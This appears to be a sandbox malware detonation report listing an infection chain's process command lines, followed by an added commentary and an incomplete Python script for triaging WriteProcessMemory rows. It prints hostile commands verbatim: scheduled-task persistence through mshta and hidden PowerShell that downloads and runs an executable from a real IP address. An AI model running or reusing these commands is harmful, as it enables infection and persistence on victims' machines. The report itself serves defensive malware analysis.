"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4260,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4484 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4476,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4572 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4560,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4576 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4508,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4780 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3848,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4976 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4552,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4596 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5208,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4768 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5016,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5000 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4596,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5088 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5356,i,12205535417490164782,9884932917361111643,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5064 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff95bb846f8,0x7ff95bb84708,0x7ff95bb84718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2008 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2512 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2928 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3276 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3272 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3204 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3204 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3448 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,6240456906870099733,4321634097677814532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3860 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe

"C:\Users\Admin\AppData\Local\Temp\10035810101\9e28748818.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn EVGXOmaAU0L /tr "mshta C:\Users\Admin\AppData\Local\Temp\5gS5yBZTV.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\5gS5yBZTV.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn EVGXOmaAU0L /tr "mshta C:\Users\Admin\AppData\Local\Temp\5gS5yBZTV.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NIKU2KFNSI0OSCJ5SNYFIAJYHYQOJDXS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10035820121\am_no.cmd" "

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\10035820121\am_no.cmd" any_word

C:\Users\Admin\AppData\Local\TempNIKU2KFNSI0OSCJ5SNYFIAJYHYQOJDXS.EXE

"C:\Users\Admin\AppData\Local\TempNIKU2KFNSI0OSCJ5SNYFIAJYHYQOJDXS.EXE"

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "XgBsCma2dsa" /tr "mshta \"C:\Temp\ILvKar5Uh.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\ILvKar5Uh.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe

"C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe

"C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe"

C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe

"C:\Users\Admin\AppData\Local\Temp\10036370101\545ca2177e.exe"

C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe

"C:\Users\Admin\AppData\Local\Temp\10036380101\3f8189a097.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe

"C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe"

C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe

"C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe"

C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe

"C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe"

C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe

"C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe"

C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe

"C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe"

C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe

"C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2236 -ip 2236

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 964

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\ProgramData\eltqgcf\oamb.exe

C:\ProgramData\eltqgcf\oamb.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe

"C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe"

C:\Users\Admin\AppData\Local\Temp\10036430101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10036430101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

Network

Files

Analysis: behavioral10

Detonation Overview

Submitted 2025-02-26 23:27
Reported 2025-02-26 23:30
Platform win10v2004-20250217-en
Max time kernel 145s
Max time network 139s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\I8L5Xon.html

Signatures

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4900 wrote to memory of 2732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 4284 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 4284 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
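
Reading the rows above: all of them are PID 4900 writing into 3824, 4284 and 3772, and source and destination are the same signed image, msedge.exe. That is how a Chromium-based browser starts its children. The browser process acts as the sandbox broker and hands each renderer, GPU and utility child its policy and IPC state with WriteProcessMemory, so same-image parent-to-child writes are expected and are not evidence of injection; the --type=crashpad-handler, gpu-process, utility and renderer command lines in the process list below are those children, and the crashpad pipe name crashpad_4900_... in the Files list is consistent with 4900 being the browser process that started the crash handler. The script that follows is an added example, not part of this report or of the sandbox's own tooling. It parses rows in the exact format shown above, collapses the repeated rows to a count per (source, destination) pair, and flags only writes that cross an image boundary. The row attributed to stage2.exe is constructed to show the flag firing; no file of that name appears in this analysis, and treating browsers other than Edge and Chrome as brokers would be a further assumption.

```python
"""Triage of 'wrote to memory' rows from a sandbox process-event list.

Added example; not part of the report or of any sandbox vendor's code.
Row format is the one shown in the report:
    PID <src> wrote to memory of <dst> N/A <src image> <dst image>
"""
import re
from collections import Counter

WRITE_RE = re.compile(
    r"^PID (?P<src>\d+) wrote to memory of (?P<dst>\d+) N/A "
    r"(?P<src_image>.+?\.exe) (?P<dst_image>.+?\.exe)$",
    re.IGNORECASE,
)

# Chromium's sandbox broker (the browser process) provisions every child it
# spawns by calling WriteProcessMemory on the new process to hand over its
# policy and IPC state, so same-image writes from an Edge/Chrome parent into
# its renderer/gpu/utility children are expected and are not injection.
# Extending this set to other browsers is an assumption, not a verified fact.
CHROMIUM_BROKERS = {"msedge.exe", "chrome.exe"}


def basename(path):
    """Image file name, lower-cased, from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """'expected-broker-write' for a Chromium parent writing into a child of
    the same image; anything crossing image boundaries is 'cross-image-write'."""
    src, dst = basename(event["src_image"]), basename(event["dst_image"])
    if src == dst and src in CHROMIUM_BROKERS:
        return "expected-broker-write"
    return "cross-image-write"


def parse_events(lines):
    """Return one dict per row that matches WRITE_RE, with a verdict attached."""
    events = []
    for line in lines:
        m = WRITE_RE.match(line.strip())
        if not m:
            continue
        e = m.groupdict()
        e["src"], e["dst"] = int(e["src"]), int(e["dst"])
        e["verdict"] = classify(e)
        events.append(e)
    return events


def summarize(events):
    """Collapse repeated rows into a count per (src, dst) pair and keep the
    rows that still need an analyst's eye."""
    pairs = Counter((e["src"], e["dst"]) for e in events)
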